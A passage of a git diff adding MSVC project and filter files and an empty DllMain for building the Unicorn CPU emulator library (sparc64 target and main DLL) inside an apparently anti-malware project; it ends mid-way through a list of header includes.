<AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc64.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/sparc64-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/sparc64-softmmu.vcxproj.filters new file mode 100644 index 0000000..cf669e8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/sparc64-softmmu.vcxproj.filters @@ -0,0 +1,125 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{ee6a3abf-6f14-47ab-8b40-f859d030230a}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{4a271b0a-7736-4457-98f8-8c21ad4d2601}</UniqueIdentifier> + </Filter> + <Filter Include="hw\sparc64"> + <UniqueIdentifier>{46e355ab-da0b-431b-929b-8d77b3ab90bc}</UniqueIdentifier> + </Filter> + <Filter Include="target-sparc"> + <UniqueIdentifier>{1f15e2b2-fae3-41e5-b787-70c44beb828c}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{7c7b0370-fe65-4c21-94e6-f4561470087d}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{51a4ddc6-4078-4db0-9b29-c68c558b2f93}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu-qom.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\helper.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\unicorn.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\sparc64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\target-sparc\cc_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\cpu.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\fop_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\ldst_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\mmu_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\translate.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\win_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\vis_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\int64_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\unicorn64.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\hw\sparc64\sun4u.c"> + <Filter>hw\sparc64</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/dllmain.cpp b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/dllmain.cpp new file mode 100644 index 0000000..3d0eb14 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/dllmain.cpp @@ -0,0 +1,18 @@ +#include <windows.h> + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/unicorn.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/unicorn.vcxproj new file mode 100644 index 0000000..b8bf19e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/unicorn.vcxproj @@ -0,0 +1,374 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>unicorn</RootNamespace> + <ProjectName>unicorn</ProjectName> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>NotUsing</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;UNICORN_DLL_EXPORTS;UNICORN_SHARED;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__i386__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>NotUsing</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;UNICORN_DLL_EXPORTS;UNICORN_SHARED;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__x86_64__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>NotUsing</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;UNICORN_DLL_EXPORTS;UNICORN_SHARED;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__i386__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + <PostBuildEvent> + <Command>mkdir "$(SolutionDir)distro\" +mkdir "$(SolutionDir)distro\include" +mkdir "$(SolutionDir)distro\include\unicorn" +mkdir "$(SolutionDir)distro\$(Platform)" + +copy "$(SolutionDir)$(Platform)\$(Configuration)\$(ProjectName).dll" "$(SolutionDir)distro\$(Platform)\" +copy "$(SolutionDir)$(Platform)\$(Configuration)\$(ProjectName).lib" "$(SolutionDir)distro\$(Platform)\" + +copy "$(SolutionDir)..\include\unicorn\*.h" "$(SolutionDir)distro\include\unicorn\" +</Command> + </PostBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>NotUsing</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;UNICORN_DLL_EXPORTS;UNICORN_SHARED;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__x86_64__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + <PostBuildEvent> + <Command>mkdir "$(SolutionDir)distro\" +mkdir "$(SolutionDir)distro\include" +mkdir "$(SolutionDir)distro\include\unicorn" +mkdir "$(SolutionDir)distro\$(Platform)" + +copy "$(SolutionDir)$(Platform)\$(Configuration)\$(ProjectName).dll" "$(SolutionDir)distro\$(Platform)\" +copy "$(SolutionDir)$(Platform)\$(Configuration)\$(ProjectName).lib" "$(SolutionDir)distro\$(Platform)\" + +copy "$(SolutionDir)..\include\unicorn\*.h" "$(SolutionDir)distro\include\unicorn\" +</Command> + </PostBuildEvent> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\list.c" /> + <ClCompile Include="..\..\..\qemu\accel.c" /> + <ClCompile Include="..\..\..\qemu\glib_compat.c" /> + <ClCompile Include="..\..\..\qemu\hw\core\machine.c" /> + <ClCompile Include="..\..\..\qemu\hw\core\qdev.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qapi-dealloc-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qapi-visit-core.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qmp-input-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qmp-output-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qapi\string-input-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qemu-log.c" /> + <ClCompile Include="..\..\..\qemu\qemu-timer.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qbool.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qdict.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qerror.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qfloat.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qint.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qlist.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qstring.c" /> + <ClCompile Include="..\..\..\qemu\qom\container.c" /> + <ClCompile Include="..\..\..\qemu\qom\cpu.c" /> + <ClCompile Include="..\..\..\qemu\qom\object.c" /> + <ClCompile Include="..\..\..\qemu\qom\qom-qobject.c" /> + <ClCompile Include="..\..\..\qemu\tcg-runtime.c" /> + <ClCompile Include="..\..\..\qemu\util\aes.c" /> + <ClCompile Include="..\..\..\qemu\util\bitmap.c" /> + <ClCompile Include="..\..\..\qemu\util\bitops.c" /> + <ClCompile Include="..\..\..\qemu\util\crc32c.c" /> + <ClCompile Include="..\..\..\qemu\util\cutils.c" /> + <ClCompile Include="..\..\..\qemu\util\error.c" /> + <ClCompile Include="..\..\..\qemu\util\getauxval.c" /> + <ClCompile Include="..\..\..\qemu\util\host-utils.c" /> + <ClCompile Include="..\..\..\qemu\util\module.c" /> + <ClCompile Include="..\..\..\qemu\util\oslib-win32.c" /> + <ClCompile Include="..\..\..\qemu\util\qemu-error.c" /> + <ClCompile Include="..\..\..\qemu\util\qemu-thread-win32.c" /> + <ClCompile Include="..\..\..\qemu\util\qemu-timer-common.c" /> + <ClCompile Include="..\..\..\qemu\vl.c" /> + <ClCompile Include="..\..\..\uc.c" /> + <ClCompile Include="..\qapi-types.c" /> + <ClCompile Include="..\qapi-visit.c" /> + <ClCompile Include="dllmain.cpp"> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + </PrecompiledHeader> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + </PrecompiledHeader> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\include\list.h" /> + <ClInclude Include="..\..\..\include\qemu.h" /> + <ClInclude Include="..\..\..\include\uc_priv.h" /> + <ClInclude Include="..\..\..\include\unicorn\arm.h" /> + <ClInclude Include="..\..\..\include\unicorn\arm64.h" /> + <ClInclude Include="..\..\..\include\unicorn\m68k.h" /> + <ClInclude Include="..\..\..\include\unicorn\mips.h" /> + <ClInclude Include="..\..\..\include\unicorn\platform.h" /> + <ClInclude Include="..\..\..\include\unicorn\sparc.h" /> + <ClInclude Include="..\..\..\include\unicorn\unicorn.h" /> + <ClInclude Include="..\..\..\include\unicorn\x86.h" /> + <ClInclude Include="..\..\..\qemu\include\config.h" /> + <ClInclude Include="..\..\..\qemu\include\elf.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\address-spaces.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-all.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-common.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-defs.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cputlb.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst_template.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\exec-all.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\gen-icount.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-gen.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-head.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-proto.h" /> + <ClInclude 